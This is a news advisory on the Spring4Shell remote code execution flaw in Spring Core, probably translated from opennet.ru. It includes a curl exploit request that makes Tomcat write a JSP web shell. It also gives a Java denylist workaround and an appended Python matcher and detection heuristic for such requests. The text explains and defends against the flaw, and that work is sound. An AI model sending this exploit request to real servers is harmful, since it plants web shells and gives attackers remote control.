Critical 0-day vulnerability in the Spring Framework, used in many Java projects

A critical zero-day vulnerability has been discovered in the Spring Core module, which is part of the Spring Framework. The vulnerability allows an unauthenticated remote attacker to execute code on the server. It is not yet clear how catastrophic the impact of this issue will be, or whether attacks will be as widespread as those seen with the Log4j 2 vulnerability. The vulnerability has been named Spring4Shell, but no CVE identifier has been assigned yet. The issue has not yet been fixed in the Spring Framework, and several working exploit variants are already available online (1, 2, 3, 4). The problem is made worse by the fact that many enterprise Java applications built on the Spring Framework run with root privileges, which allows the vulnerability to fully compromise the system.

According to some estimates, the Spring Core module is used in 74% of Java applications. The severity of the vulnerability is reduced by the fact that it only affects applications that use the "@RequestMapping" annotation to bind request handlers and web form parameters in "name=value" format (POJO, Plain Old Java Object), rather than JSON/XML.

It is not yet clear which Java applications and frameworks are affected by this issue. The vulnerability is blocked by adding the fields "class", "module" and "classLoader" to a denylist, or by using an explicit allowlist of permitted fields. Exploitation is only possible on Java/JDK 9 or later. The issue is caused by a possible bypass of CVE-2010-1622, a vulnerability fixed in the Spring Framework in 2010 that involved invoking the classLoader handler while parsing request parameters.

The exploit works by sending a request with parameters of the form "class.module.classLoader.resources.context.parent.pipeline.first.*". Processing these parameters creates a JSP file in the Apache Tomcat root environment and writes the attacker's own code into that file. The created file becomes reachable by direct requests and can be used as a web shell. To attack a vulnerable application running in an Apache Tomcat environment, it is enough to send a request with specific parameters using the curl tool:

    curl -v -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=code_to_insert_into_file\
    &class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp\
    &class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT\
    &class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar\
    &class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" \
    http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-SNAPSHOT/rapid7

This issue in Spring Core should not be confused with the recently discovered vulnerabilities CVE-2022-22963 and CVE-2022-22950. The first affects the Spring Cloud package and was fixed in releases 3.1.7 and 3.2.3. The second affects Spring Expression and was fixed in Spring Framework 5.3.17. These are fundamentally different vulnerabilities. The Spring Framework developers have not yet made any statement about the new vulnerability or published a fix.

As a temporary security measure, it is recommended to add a denylist of disallowed request parameters in the application code (the "*" wildcards are required, because the binder's field matching only treats patterns containing "*" as prefix/suffix matches; an entry such as "class." on its own would only block a field literally named "class."):

    import org.springframework.core.Ordered;
    import org.springframework.core.annotation.Order;
    import org.springframework.web.bind.WebDataBinder;
    import org.springframework.web.bind.annotation.ControllerAdvice;
    import org.springframework.web.bind.annotation.InitBinder;

    // Applies to every controller; the high @Order value runs it after other advice.
    @ControllerAdvice
    @Order(10000)
    public class BinderControllerAdvice {

        // Registers disallowed field patterns on every WebDataBinder so that
        // request parameters such as "class.module.classLoader..." are never bound.
        @InitBinder
        public void setAllowedFields(WebDataBinder dataBinder) {
            String[] denylist = new String[]{"class.*", "Class.*", "*.class.*", "*.Class.*"};
            dataBinder.setDisallowedFields(denylist);
        }
    }
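As an added illustration that is not part of the original article, the following Python checks the parameter names from the curl request above against the denylist patterns of the workaround (with their "*" wildcards), using a re-implementation of the simple wildcard matching Spring applies to disallowed binder fields (an assumption about its semantics, not Spring's own code), and shows a case-insensitive detection heuristic for such requests.

```python
from urllib.parse import parse_qsl

# Denylist patterns from the workaround, wildcards included.
DENYLIST = ["class.*", "Class.*", "*.class.*", "*.Class.*"]

# Constructed sample: the POST body of the curl request above, with the
# attacker-controlled pattern value replaced by a placeholder and a benign
# "name" parameter appended.
SAMPLE_BODY = (
    "class.module.classLoader.resources.context.parent.pipeline.first.pattern=PLACEHOLDER"
    "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
    "&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT"
    "&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar"
    "&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
    "&name=alice"
)


def simple_match(pattern, s):
    """Spring-style simple matching (assumed semantics): a pattern without '*'
    must match exactly; 'xxx*', '*xxx', '*xxx*' and 'xxx*yyy' are supported."""
    first = pattern.find("*")
    if first == -1:
        return pattern == s
    if first == 0:
        if len(pattern) == 1:
            return True
        nxt = pattern.find("*", 1)
        if nxt == -1:
            return s.endswith(pattern[1:])
        part = pattern[1:nxt]
        if not part:
            return simple_match(pattern[nxt:], s)
        idx = s.find(part)
        while idx != -1:
            if simple_match(pattern[nxt:], s[idx + len(part):]):
                return True
            idx = s.find(part, idx + 1)
        return False
    return (len(s) >= first and pattern[:first] == s[:first]
            and simple_match(pattern[first:], s[first:]))


def disallowed_fields(body, denylist=DENYLIST):
    """Return the parameter names the binder would refuse to bind."""
    names = [name for name, _ in parse_qsl(body, keep_blank_values=True)]
    return [n for n in names if any(simple_match(p, n) for p in denylist)]


def is_spring4shell_probe(body):
    """Detection heuristic for logs or a WAF: a parameter name that starts at
    'class.' and traverses into '.classloader.', compared case-insensitively
    so capitalised variants are caught as well."""
    for name, _ in parse_qsl(body, keep_blank_values=True):
        n = name.lower()
        if n.startswith("class.") and ".classloader." in n:
            return True
    return False
```

Passing the denylist without wildcards (for example ["class.", "Class."]) to disallowed_fields returns an empty list for the sample body, which is why the wildcards matter.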

Source: opennet.ru
